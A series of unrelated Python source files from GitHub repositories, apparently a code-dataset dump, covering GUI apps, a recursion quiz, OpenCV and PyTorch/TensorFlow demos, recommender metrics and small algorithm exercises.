validatecommand=self.vcmd_add_class)\n time_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.time_text.set(\"\")\n time_entry.grid(column=1, row=8, pady=(0, 10), sticky=\"W\")\n\n # --------------- indicator label\n self.indicator_label = Label(self.add_frame, text=\"\", fg=GREEN, bg=BLACK, font=(FONT, 12, \"bold\"))\n self.indicator_label.grid(column=1, row=9, pady=(50, 50))\n\n # --------------- cancel button\n cancel_button = Button(self.add_frame, text=\"Cancel\", command=self.manage_class, width=14, height=1)\n cancel_button.configure(background=BLACK, fg=WHITE, font=(FONT, 12, \"bold\"))\n cancel_button.grid(column=0, row=10, sticky=\"E\")\n\n # --------------- add new button\n add_new_button = Button(self.add_frame, text=\"Add New\", command=self.add_new_schedule, width=14, height=1)\n add_new_button.configure(background=PURPLE, fg=WHITE, font=(FONT, 12, \"bold\"))\n add_new_button.grid(column=2, row=10, sticky=\"W\")\n\n # --------------- add new enter\n self.main_window.bind(\"\", self.add_new_schedule)\n\n # -------------------------------------------- manage class function -------------------------------------------- #\n def callback_manage_class(self, *args):\n self.search = str(self.search_text.get())\n\n def vcmd_manage_class(self):\n self.search_text.trace_add(\"write\", callback=self.callback_manage_class)\n\n def click_search(self, *args):\n if str(self.search_text.get()) == \"Search...\":\n self.search_text.set(\"\")\n\n def leave_search(self, *args):\n if str(self.search_text.get()) == \"\":\n self.search_text.set(\"Search...\")\n\n def to_menu(self):\n from menu import Menu\n menu_page = Menu(self.main_window)\n menu_page.menu_page()\n\n def class_info(self, *event):\n try:\n select = self.schedule_table.focus()\n class_code = dict(self.schedule_table.item(select))\n class_code = class_code[\"values\"][0]\n\n from view_class_info import ViewClassInfo\n vci = ViewClassInfo(self.main_window, class_code)\n vci.view_class_info()\n except:\n return\n\n # -------------------------------------------- search class ui -------------------------------------------- #\n def search_class(self, *event):\n query = str(self.search)\n selections = []\n for child in self.schedule_table.get_children():\n item = self.schedule_table.item(child)[\"values\"]\n if query.lower() in item[0].lower() or query.lower() in item[1].lower() or query.lower() in item[2].lower():\n selections.append(child)\n\n self.schedule_table.selection_set(selections)\n try:\n self.schedule_table.see(str(selections[0]))\n except:\n pass\n\n # -------------------------------------------- manage class ui -------------------------------------------- #\n def manage_class(self):\n # --------------- reset page\n for widget in self.main_window.winfo_children():\n widget.destroy()\n \n manage_class_frame = Frame(self.main_window, bg=BLACK)\n manage_class_frame.grid(column=0, row=0)\n\n manage_class_label = Label(manage_class_frame, text=\"MANAGE CLASS SCHEDULE\", fg=WHITE, bg=BLACK, font=(FONT, 35, \"bold\"))\n manage_class_label.grid(column=0, row=0, padx=50, columnspan=2)\n\n # --------------- search\n search_bar = Entry(manage_class_frame, width=60, validate=\"focusin\", validatecommand=self.vcmd_manage_class, textvariable=self.search_text)\n self.search_text.set(\"Search...\")\n search_bar.bind(\"\", self.click_search)\n search_bar.bind(\"\", self.leave_search)\n search_bar.configure(background=GRAY, fg=BLACK, font=(FONT, 16))\n search_bar.grid(column=0, row=1, padx=10, pady=10, columnspan=2)\n\n 
self.main_window.bind(\"\", self.search_class)\n\n # --------------- table page\n table_style = tk.Style()\n table_style.configure(\"Treeview\", font=(\"Poppins\", 12), rowheight=30)\n table_style.configure(\"Treeview.Heading\", font=(\"Poppins\", 12, \"bold\"))\n\n scrollbar = Scrollbar(manage_class_frame, orient=\"vertical\")\n scrollbar.grid(column=1, row=2, sticky=\"NSE\", columnspan=2)\n\n self.schedule_table = tk.Treeview(manage_class_frame, yscrollcommand=scrollbar.set)\n self.schedule_table.grid(column=0, row=2, columnspan=2, sticky=\"W\")\n\n scrollbar.config(command=self.schedule_table.yview)\n\n self.schedule_table[\"columns\"] = (\"Class\", \"Course\", \"Time\")\n self.schedule_table.column(\"#0\", width=0, stretch=NO)\n self.schedule_table.column(\"Class\", anchor=CENTER, width=130, stretch=NO)\n self.schedule_table.column(\"Course\", anchor=CENTER, width=300, stretch=NO)\n self.schedule_table.column(\"Time\", anchor=CENTER, width=300, stretch=NO)\n\n self.schedule_table.heading(\"#0\", text=\"\", anchor=CENTER)\n self.schedule_table.heading(\"Class\", text=\"Class\", anchor=CENTER)\n self.schedule_table.heading(\"Course\", text=\"Course\", anchor=CENTER)\n self.schedule_table.heading(\"Time\", text=\"Time\", anchor=CENTER)\n\n self.main_window.bind(\"\", self.class_info)\n\n counter = 0\n for class_code in self.class_dict:\n subject = self.class_dict[class_code][\"Subject\"]\n time_stamp = self.class_dict[class_code][\"Time\"]\n self.schedule_table.insert(parent=\"\", index=\"end\", iid=counter, text=\"\", values=(f\"{class_code}\", f\"{subject}\", f\"{time_stamp}\"))\n counter += 1\n \n if len(self.class_dict) == 0:\n self.schedule_table.insert(parent=\"\", index=\"end\", iid=counter, text=\"\", values=(\"\", \"Please Enter Data to Continue\", \"\"))\n\n # --------------- back button\n back_button = Button(manage_class_frame, text=\"Back\", command=self.to_menu, width=14, height=1)\n back_button.configure(background=BLACK, fg=WHITE, font=(FONT, 12, \"bold\"))\n back_button.grid(column=0, row=3, pady=20, sticky=\"W\")\n\n # --------------- add class button\n add_class_button = Button(manage_class_frame, text=\"Add New\", command=self.add_class_schedule, width=14, height=1)\n add_class_button.configure(background=PURPLE, fg=WHITE, font=(FONT, 12, \"bold\"))\n add_class_button.grid(column=1, row=3, pady=20, sticky=\"E\")","repo_name":"jptriciaestella/face_card","sub_path":"ui/manage_class.py","file_name":"manage_class.py","file_ext":"py","file_size_in_byte":11728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8700768033","text":"#Coding:utf-8\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QLabel, QLineEdit, QPushButton\nfrom PyQt5.QtGui import QFont, QColor\nimport sys\nfrom random import choice\n\n\nclass MW(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setFixedSize(800, 600)\n # то, какие коэфециенты в шаблоне для рекурсии\n # [+-1, т.е. 
больше числа или меньше, когда есть рекурсия; чему кратно при проверке на рекурсию; чило, относительно которого всё происходит; слогаемое при нерекурсии; коэфициент при n^2 в формуле с рекурсией;\n # 5) коэфициент при n в формуле с рекурсией; слогаемое в формуле с рекурсией; коэфициент при рекурсии; слогаемое в рекурсии]\n self.variables = [1, 1, 10, 0, 0,\n 1, 1, 1, 1]\n # второй исход с рекурсивной формулой\n # [коэфициент при n^2 в формуле с рекурсией; коэфициент при n в формуле с рекурсией; слогаемое в формуле с рекурсией; коэфициент при рекурсии; слогаемое в рекурсии]\n self.variables2 = [0, 1, 1, 1, 1]\n self.whatcall = 10 # от чего вызываем\n self.answer = 0 # ответ на задачу\n # кнопка обновления\n self.updatebtn = QPushButton(self)\n self.updatebtn.clicked.connect(self.update)\n self.updatebtn.resize(50, 50)\n self.updatebtn.move(750, 550)\n self.updatebtn.setFont(QFont('Arial', 12))\n self.updatebtn.setText('ОБН')\n # лабел \"ответ\"\n self.anslab = QLabel(self)\n self.anslab.resize(150, 50)\n self.anslab.move(0, 550)\n self.anslab.setFont(QFont('Arial', 12))\n self.anslab.setText('ОТВЕТ:')\n # поле для ответа\n self.ansedit = QLineEdit(self)\n self.ansedit.resize(300, 50)\n self.ansedit.move(155, 550)\n self.ansedit.setFont(QFont('Arial', 12))\n # правильный ответ/нет лабел\n self.oklab = QLabel(self)\n self.oklab.resize(50, 50)\n self.oklab.move(460, 550)\n self.oklab.setFont(QFont('Arial', 12))\n self.oklab.setText('ДА')\n self.oklab.hide()\n # кнопка для проверки\n self.checkbtn = QPushButton(self)\n self.checkbtn.clicked.connect(self.checkAns)\n self.checkbtn.resize(150, 50)\n self.checkbtn.move(510, 550)\n self.checkbtn.setFont(QFont('Arial', 12))\n self.checkbtn.setText('ПРОВЕРИТЬ')\n # виджеты с условием на экране\n # [условие с =; возврвт с рекурсией; условие без =; возврат без рекурсии]\n self.tasklabs = []\n for i in range(7):\n self.tasklabs.append(QLabel(self))\n self.tasklabs[-1].resize(800, 50)\n self.tasklabs[-1].move(0, i * 55)\n self.tasklabs[-1].setFont(QFont('Ariel', 12))\n self.tasklabs[-1].show()\n \n def update(self):\n '''обновление задачи'''\n self.oklab.hide() # скрытие лабела\n # рандомизация коэфициентов\n self.variables = [choice([-1, 1]), choice([1, 2, 3]), choice(range(1, 25)), choice(range(-5, 5)), choice(range(-5, 5)),\n choice(range(-10, 5)), choice(range(-20, 20)), choice(list(range(-5, 0)) + list(range(1, 5))), choice(range(1, 5))]\n self.variables2 = [choice(range(-5, 5)), choice(range(-10, 5)), choice(range(-20, 20)), choice(list(range(-5, 0)) + list(range(1, 5))), choice(range(1, 5))]\n self.whatcall = choice(range(10, 500)) # рандомизация аргумента\n self.answer = self.getRec(self.whatcall)\n # заполняем лабел 0 (заголовок нерекурсии)\n s = 'При n <= ' + str(self.variables[2]) + ':' # просто строка для промежуточного хранения текста\n if self.variables[0] == -1:\n s = s.replace('<', '>')\n self.tasklabs[0].setText(s)\n # заполняем лабел 1 (формула нерекурсии)\n s = 'F(n) = n '\n if self.variables[3] < 0:\n s = s + '- ' + str(-1 * self.variables[3])\n elif self.variables[3] > 0:\n s = s + '+ ' + str(self.variables[3])\n self.tasklabs[1].setText(s)\n # заполняем лабел 2 (заголовок рекурсии)\n s = 'При n > ' + str(self.variables[2])\n if self.variables[0] == -1:\n s = s.replace('>', '<')\n if self.variables[1] != 1:\n s = s + ' и кратно ' + str(self.variables[1])\n s = s + ':'\n self.tasklabs[2].setText(s)\n # заполняем лабел 3 (формула рекурсии)\n s = 'F(n) = '\n if self.variables[7] == 1: # перед рекурсией\n s = s + 'F(n )'\n else:\n s = s + 
str(self.variables[7]) + 'F(n '\n if self.variables[0] == -1: # слогаемое в рекурсии\n s = s + '+ ' + str(self.variables[8]) + ') '\n else:\n s = s + '- ' + str(self.variables[8]) + ') '\n if self.variables[4] == 1: # n^2\n s = s + '+ ' + 'n^2 '\n elif self.variables[4] < 0:\n s = s + str(self.variables[4]) + 'n^2 '\n elif self.variables[4] > 0:\n s = s + '+' + str(self.variables[4]) + 'n^2 '\n if self.variables[5] == 1: # n\n s = s + '+ ' + 'n'\n elif self.variables[5] < 0:\n s = s + str(self.variables[5]) + 'n '\n elif self.variables[5] > 0:\n s = s + '+' + str(self.variables[5]) + 'n '\n if self.variables[6] < 0: # слогаемое\n s = s + str(self.variables[6])\n elif self.variables[6] > 0:\n s = s + '+' + str(self.variables[6])\n self.tasklabs[3].setText(s) # запись на лабел\n # лабелы 4 и 5 (доп строки для кратности)\n if self.variables[1] == 1:\n self.tasklabs[4].setText('Чему равно F(' + str(self.whatcall) + ')?')\n self.tasklabs[5].setText('')\n self.tasklabs[6].setText('')\n else:\n self.tasklabs[4].setText('Иначе:')\n s = 'F(n) = '\n if self.variables2[3] == 1: # перед рекурсией\n s = s + 'F(n )'\n else:\n s = s + str(self.variables2[3]) + 'F(n '\n if self.variables[0] == -1: # слогаемое в рекурсии\n s = s + '+ ' + str(self.variables2[4]) + ') '\n else:\n s = s + '- ' + str(self.variables2[4]) + ') '\n if self.variables2[0] == 1: # n^2\n s = s + '+ ' + 'n^2 '\n elif self.variables2[0] < 0:\n s = s + str(self.variables2[0]) + 'n^2 '\n elif self.variables2[0] > 0:\n s = s + '+' + str(self.variables2[0]) + 'n^2 '\n if self.variables2[1] == 1: # n\n s = s + '+ ' + 'n'\n elif self.variables2[0] < 0:\n s = s + str(self.variables2[0]) + 'n '\n elif self.variables2[0] > 0:\n s = s + '+' + str(self.variables2[0]) + 'n '\n if self.variables2[2] < 0: # слогаемое\n s = s + str(self.variables2[2])\n elif self.variables2[2] > 0:\n s = s + '+' + str(self.variables2[2])\n self.tasklabs[5].setText(s) # запись на лабел\n self.tasklabs[6].setText('Чему равно F(' + str(self.whatcall) + ')?')\n\n \n def getRec(self, whatcall):\n '''возвращает, что должно быть в результате рекурсии'''\n if self.variables[0] == 1 and whatcall <= self.variables[2] or\\\n self.variables[0] == -1 and whatcall >= self.variables[2]: # возвращается не рекурсия\n return whatcall + self.variables[3]\n elif (self.variables[0] == 1 and whatcall > self.variables[2] or\\\n self.variables[0] == -1 and whatcall < self.variables[2]) and whatcall % self.variables[1] == 0: # возвращается рекурсия при кратном\n return self.variables[7] * self.getRec(whatcall - self.variables[0] * self.variables[8]) + self.variables[4] * whatcall ** 2 +\\\n whatcall * self.variables[5] + self.variables[6]\n else: # возврвщает при некратном\n return self.variables2[3] * self.getRec(whatcall - self.variables[0] * self.variables2[4]) + self.variables2[0] * whatcall ** 2 +\\\n whatcall * self.variables2[1] + self.variables[2]\n\n def checkAns(self):\n try:\n ans = int(self.ansedit.text())\n self.oklab.show()\n if ans == self.answer:\n self.oklab.setText('
ДА')\n else:\n self.oklab.setText('НЕТ')\n except:\n self.oklab.setText('ERR,
    ')\n print(self.answer)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mw = MW()\n mw.show()\n sys.exit(app.exec_())\n ","repo_name":"Helegerd/recursia","sub_path":"recursia.py","file_name":"recursia.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13725327482","text":"import cv2 \nimport numpy as np\n\n# function to draw\ncount = 0\nx1 = 0\ny1 = 0\nx2 = 0\ny2 = 0\ndef draw(event, x, y, flags, param):\n global count, x1, y1, x2, y2\n if (event == cv2.EVENT_LBUTTONDOWN) and count == 0:\n x1 = x\n y1 = y\n count+=1\n elif (event == cv2.EVENT_LBUTTONDOWN) and count == 1:\n x2 = x\n y2 = y\n count = 0\n cv2.rectangle(img, pt1=(x1, y1), pt2=(x2, y2), color=(0,3,0), thickness=1)\n# else:\n# cv2.rectangle(img , pt1=(0,500), pt2=(500, 0), color=(0,0,0), thickness=-1)\n \n# connect to Callback function to draw\ncv2.namedWindow(winname = \"Title_bar\")\ncv2.setMouseCallback('Title_bar', draw)\n\n# image to show\n\nimg = np.zeros([500, 500, 3])\n\n# window operation\n\n\n# if we use \"and\" instead of \"&\" then the operation will not work because here we are doing bitwise and between \"cv2.waitKey(1)\"and\n# binary of 0xFF and checking whether the value of \"(cv2.waitKey(1) & 0xFF)\" is equal to ordinal value of q or say numeric value of \"q\"\n\n# https://stackoverflow.com/questions/35372700/whats-0xff-for-in-cv2-waitkey1\n# https://stackoverflow.com/questions/53357877/usage-of-ordq-and-0xff?rq=1\n\nwhile True:\n cv2.imshow('Title_bar', img)\n \n if (cv2.waitKey(1) & 0xFF) == ord('q'):\n break\n \ncv2.destroyAllWindows()","repo_name":"harshvardhan-anand/Artificial-Intelligence-Notes","sub_path":"ComputerVision/Notes/RectangleDrawWithMouse.py","file_name":"RectangleDrawWithMouse.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25849316364","text":"import torch\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torchvision.models import resnet18\nimport matplotlib.pyplot as plt\n\nmodel = resnet18(num_classes=2)\noptimizer = optim.SGD(params=model.parameters(), lr=0.05)\n\n# lr_scheduler.StepLR()\n# Assuming optimizer uses lr = 0.05 for all groups\n# lr = 0.05 if epoch < 30\n# lr = 0.005 if 30 <= epoch < 60\n# lr = 0.0005 if 60 <= epoch < 90\n\nscheduler = lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.1)\nplt.figure()\nx = list(range(100))\ny = []\nfor epoch in range(100):\n scheduler.step()\n lr = scheduler.get_lr()\n # print(epoch, scheduler.get_lr()[0]) # get_lr()\n y.append(scheduler.get_lr()[0])\nplt.plot(x, y)\nplt.savefig('lr_step.png')","repo_name":"PresageBoat/LRCurve","sub_path":"lr_curve/lr_step_curve.py","file_name":"lr_step_curve.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43430623747","text":"import time\nfrom triangle import classify_triangle\n\n# examples taken from test_triangle.py\ntriangles = [\n # invalid\n (1, 2, 9), (1, 9, 2), (2, 1, 9), (2, 9, 1), (9, 1, 2), (9, 2, 1),\n (1, 1, -1), (1, -1, 1), (-1, 1, 1),\n # equilateral\n (1, 1, 1), (100, 100, 100), (99, 99, 99),\n # isosceles\n (100, 90, 90), (90, 100, 90), (90, 90, 100), (2, 2, 3),\n # scalene\n (5, 4, 3), (5, 3, 4), (4, 5, 3), (4, 3, 5), (3, 5, 4),\n]\n\n\nif __name__ == '__main__':\n # we don't really care about the output (we know the function work, 
from the test suite)\n # we just want to have something on which to measure running time\n\n for _ in range(3):\n for triangle in triangles:\n classify_triangle(*triangle)\n","repo_name":"bloa/magpie","sub_path":"examples/code/triangle-py_slow/run_triangle.py","file_name":"run_triangle.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"16768992632","text":"#建立评价指标,评价模型\nimport numpy as np\nfrom users.recommend.myRecommend import *\n\n#召回率描述有多少比例的用户—物品评分记录包含在最终的推荐列表中,而准确率描述最终的推荐列表中有多少比例是发生过的用户—物品评分记录\n\ndef recall(trainset,testset,N,recommend,movie_matrix,user_matrix):\n all=0\n rec_list=0\n for user,movie in trainset.items():\n if user_matrix[user] in testset.keys():\n test_u=testset[user_matrix[user]]\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n if item in test_u:\n rec_list+=1\n all+=len(test_u)\n return rec_list/all\n\ndef precision(trainset,testset,N,recommend,movie_matrix,user_matrix):\n all=0\n rec_list=0\n # rs=recommendSys()\n for user,movie in trainset.items():\n if user_matrix[user] in testset.keys():\n test_u=testset[user_matrix[user]]\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n if item in test_u:\n rec_list+=1\n all+=N\n return rec_list/all\n\n\n#覆盖率表示最终的推荐列表中包含多大比例的物品\ndef coverage(trainset,testset,N,recommend,movie_matrix,user_matrix):\n allitems=set()\n coverageitems=set()\n for user,movie in trainset.items():\n for item in trainset[user].keys():\n allitems.add(item)\n\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n coverageitems.add(item)\n return len(coverageitems)/len(coverageitems)\n\n\n#新颖度:用推荐列表中物品的平均流行度度量推荐结果的新颖度,如果推荐出的物品都很热门,说明推荐的新颖度较低,否则说明推荐结果比较新颖。\ndef popularity(trainset,testset,N,recommend,movie_matrix,user_matrix):\n #得到流行表\n popularitems=dict()\n for user,movie in trainset.items():\n for item in movie.keys():\n if item not in popularitems:\n popularitems[item]=0\n popularitems[item]+=1\n res=0\n n=0\n for user,movie in trainset.items():\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n res+=np.log(1+popularitems[item])\n n+=1\n\n return res/n\n\n","repo_name":"iambajie/movie-recommend","sub_path":"users/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13172919839","text":"# 给定一个二叉树,它的每个结点都存放一个 0-9 的数字,每条从根到叶子节点的路径都代表一个数字。\n#\n# 例如,从根到叶子节点路径 1->2->3 代表数字 123。 \n#\n# 计算从根到叶子节点生成的所有数字之和。 \n#\n# 说明: 叶子节点是指没有子节点的节点。 \n#\n# 示例 1: \n#\n# 输入: [1,2,3]\n# 1\n# / \\\n# 2 3\n# 输出: 25\n# 解释:\n# 从根到叶子节点路径 1->2 代表数字 12.\n# 从根到叶子节点路径 1->3 代表数字 13.\n# 因此,数字总和 = 12 + 13 = 25.\n#\n# 示例 2: \n#\n# 输入: [4,9,0,5,1]\n# 4\n# / \\\n# 9 0\n#  / \\\n# 5 1\n# 输出: 1026\n# 解释:\n# 从根到叶子节点路径 4->9->5 代表数字 495.\n# 从根到叶子节点路径 4->9->1 代表数字 491.\n# 从根到叶子节点路径 4->0 代表数字 40.\n# 因此,数字总和 = 495 + 491 + 40 = 1026.\n#\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Node:\n def __init__(self, item):\n 
self.item = item\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def __init__(self):\n self.root = None\n\n def add(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n else:\n q = [self.root]\n\n while True:\n pop_node = q.pop(0)\n if pop_node.left is None:\n pop_node.left = node\n return\n elif pop_node.right is None:\n pop_node.right = node\n return\n else:\n q.append(pop_node.left)\n q.append(pop_node.right)\n\n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :type sum: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n self.auxPathSum(root, [], res)\n\n return sum(res)\n\n def auxPathSum(self, root, cur_list, cur_lists):\n if not root:\n return\n if not root.left and not root.right:\n # cur_lists.append(cur_list + [root.item])\n cur_lists.append(int(''.join(str(i) for i in cur_list + [root.item])))\n return\n if root.left:\n self.auxPathSum(root.left, cur_list + [root.item], cur_lists)\n if root.right:\n self.auxPathSum(root.right, cur_list + [root.item], cur_lists)\n\n\nt = Solution()\nfor i in range(1, 4):\n t.add(i)\nprint('遍历:', t.sumNumbers(t.root))\n","repo_name":"wellqin/USTC","sub_path":"leetcode/editor/cn/[129]求根到叶子节点数字之和.py","file_name":"[129]求根到叶子节点数字之和.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34118032047","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tqdm\nimport matplotlib.pyplot as pl\n\n\nmnist = input_data.read_data_sets('tmp/mnist_data', one_hot=True)\n\nx_train, y_train = mnist.train.images, mnist.train.labels\n\nx = tf.placeholder(tf.float32, shape=[None, 784], name='x_place')\ny = tf.placeholder(tf.float32, shape=[None, 10], name='y_place')\n\n\nnn = tf.layers.conv2d(\n inputs=tf.reshape(x, shape=[-1, 28, 28, 1]),\n filters=32,\n kernel_size=(5, 5),\n padding='same',\n activation=tf.nn.relu\n)\n\nnn = tf.layers.max_pooling2d(\n inputs=nn,\n pool_size=(2, 2),\n strides=2,\n padding='same'\n)\n\nnn = tf.layers.conv2d(\n inputs=nn,\n filters=64,\n kernel_size=(5, 5),\n padding='same',\n activation=tf.nn.relu\n)\n\nnn = tf.layers.max_pooling2d(\n inputs=nn,\n pool_size=(2, 2),\n strides=2,\n padding='same'\n)\n\npool_dense = tf.layers.dense(tf.reshape(nn, [-1, 7 * 7 * 64]), units=1024, activation=tf.nn.relu)\nres = tf.layers.dense(pool_dense, units=10, activation=tf.nn.sigmoid)\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=res), name='Loss')\nprediction = tf.argmax(res, axis=1)\n\noptimizer = tf.train.GradientDescentOptimizer(0.03).minimize(loss)\n\nepochs = 1200\nerrors = []\npred_error = []\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in tqdm.tqdm(range(epochs)):\n batch = mnist.train.next_batch(8)\n _, err = sess.run([optimizer, loss], feed_dict={x: batch[0].reshape(8, 784),\n y: batch[1].reshape(8, 10)})\n errors.append(err)\n\n v = mnist.test.next_batch(1)\n pl.imshow(v[0].reshape(28, 28))\n pl.imshow(sess.run(nn, feed_dict={x: v[0].reshape(1, 784)}).reshape(56, 56))\n print()\n print(f\"Pred: {sess.run(prediction, feed_dict={x: v[0].reshape(1, 784)})}\")\n print(f\"Real: {v[1]}\")\n\n# pl.plot(errors)\npl.show()","repo_name":"MikhailKravets/tf","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6519433490","text":"from 
modelo import actualizarCama, actualizarPaciente, actualizarServicio, camasVacias, eliminarPaciente, ingresarPaciente, insertarPaciente, readCamas, readPacientes, readServicio\n\nseleccion2=0\nclass Menu:\n def __init__(self,*arg):\n self.opciones=arg\n def __str__(self) -> str:\n texto=\"seleccione una opcion\"\n for i in range(len(self.opciones)):\n texto+=f\"\\n{i+1} - {self.opciones[i]}\"\n return texto+\"\\n\"\n\n \ndef wrapCrearPaciente ():\n insertarPaciente(input(\"Inserte el nombre\\n\"), input(\"Inserte RUT del paciente\\n\"),input(\"Ingrese la fecha de nacimiento\\n\"))\n print(\"Paciente creado con èxito\")\n\ndef wrapEliminarPaciente ():\n eliminarPaciente(input(\"Nombre del paciente\\n\"))\n print(\"Paciente eliminado con èxito\")\n\ndef wrapEditarPaciente ():\n actualizarPaciente(input(\"Ingrese el nombre del paciente\\n\"), input(\"Ingrese nombre nuevo\"))\n\ndef wrapActualizarCama ():\n actualizarCama(input(\"Ingrese le nombre de la cama\\n\"), input(\"Ingrese el nuevo nombre de la cama\\n\"))\ndef wrapActualizarServicio ():\n actualizarServicio(input(\"Ingrese el nombre del servicio\\n\", input(\"Ingrese el nuevo nombre del servicio\\n\")))\n\ndef wrapIngresarPaciente ():\n ingresarPaciente(input(\"Nombre del paciente\\n\"), input(\"Nombre de la cama\\n\"), input (\"Fecha de inicio\"), input(\"Fecha final\"))\n\n\ndef menuInput (menu):\n \"\"\"\n Descripción de la función\n \"\"\" \n seleccion2 = input(menu)\n menuprincipal[int(seleccion)-1][int(seleccion2)]()\n \nmenuprincipal=[\n [lambda : menuInput(Menu(\"Crear\", \"Editar\",\"Listar\",\"Eliminar\")),\n wrapCrearPaciente,\n wrapEditarPaciente,\n readPacientes,\n wrapEliminarPaciente\n ],\n [lambda : menuInput(Menu(\"Consultar cama\", \"Editar cama\", \"Consultar servicios\", \"Editar servicios\")),\n readCamas,\n wrapActualizarCama,\n readServicio,\n wrapActualizarServicio,\n\n ],\n [lambda : menuInput(Menu(\"Ingresar paciente\", \"Consultar camas disponibles\")),\n wrapIngresarPaciente,\n camasVacias,\n ]\n]\nseleccion=input(Menu(\"Pacientes\",\"Mantenedores\",\"Gestiòn de camas\"))\n\nmenuprincipal[int(seleccion)-1][int(seleccion2)]()","repo_name":"Shadowrunner11/TrabajoIgnacio","sub_path":"vista.py","file_name":"vista.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6017952931","text":"from src.models.head import Head\nfrom src.models.loss import OneNetLoss\nimport torch\nfrom src.models.object_detection.matcher import MinCostMatcher\nfrom src.nn.fpn import SimpleFPN\nfrom src.nn.vit import ViT\nfrom einops import rearrange\nfrom src.nn.adapters import ViTAdapterForNeck\nfrom src.models.object_detection.yoto import YOTOForObjectDetection\n\nbackbone = ViTAdapterForNeck(ViT(224, patch_size=16, width=768, layers=4, heads=8, output_dim=512))\nfpn = SimpleFPN(in_channels=768)\nhead = Head(256, channels=256, num_classes=2)\ncriterion = OneNetLoss(num_classes=2, matcher=MinCostMatcher())\n\n\nyoto = YOTOForObjectDetection(backbone, fpn, head)\npixel_values = torch.randn((2, 3, 224, 224))\nouts = yoto(pixel_values)\n\nclass_labels = torch.tensor(\n [\n [1, 0],\n [0, 0],\n ]\n)\nboxes_labels = torch.tensor(\n [\n [\n [0.1, 0.1, 0.3, 0.3],\n [0.2, 0.2, 0.4, 0.4],\n ],\n [[0.1, 0.1, 0.3, 0.3], [0, 0, 0, 0]], # pad\n ]\n)\nmask_labels = torch.tensor([[1, 1], [1, 0]], dtype=torch.bool)\nprint(class_labels.shape, boxes_labels.shape)\n\nfeatures = backbone(pixel_values)\nprint(features[0].shape, 
print(len(features)))\npyramids = fpn(features)\nouts = head(pyramids)\nlosses = criterion(*outs, class_labels, boxes_labels, torch.tensor([640]), mask_labels)\n\nprint(losses)\n","repo_name":"FrancescoSaverioZuppichini/detector","sub_path":"playgrounds/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"38759075509","text":"\"\"\"\nYou are given two positive numbers A and B. You need to find the maximum valued integer X such that:\nX divides A i.e. A % X = 0\nX and B are co-prime i.e. gcd(X, B) = 1\nFor example,\nA = 30\nB = 12\nWe return\nX = 5\n\"\"\"\n\n\n# We know A is the greatest number dividing A. So if A and B are coprime, we can return the value of X to be A.\n# Else, we can try to remove the common factors of A and B from A.\n# We can try to remove the common factors of A and B from A by finding the greatest common divisor\n# (gcd) of A and B and dividing A with that gcd.\n# Mathematically, A = A / gcd(A, B) —— STEP1\n# Now, we repeat STEP1 till we get gcd(A, B) = 1.\n# Atlast, we return X = A\n\nclass Solution:\n # @param A : integer\n # @param B : integer\n # @return an integer\n def cpFact(self, A, B):\n while True:\n A1 = A\n B1 = B\n # Find gcd\n while B1 > 0:\n A1, B1 = B1, A1 % B1\n if A1 == 1:\n return A\n A = A // A1\n return A\n","repo_name":"iamrishap/PythonBits","sub_path":"InterviewBits/math/largest-coprime-divisor.py","file_name":"largest-coprime-divisor.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20542812547","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCustomer: Powerhouse Fitness\nWebsite: http://www.fitness-superstore.co.uk\nExtract all products on site, including product options\n\nTicket link: 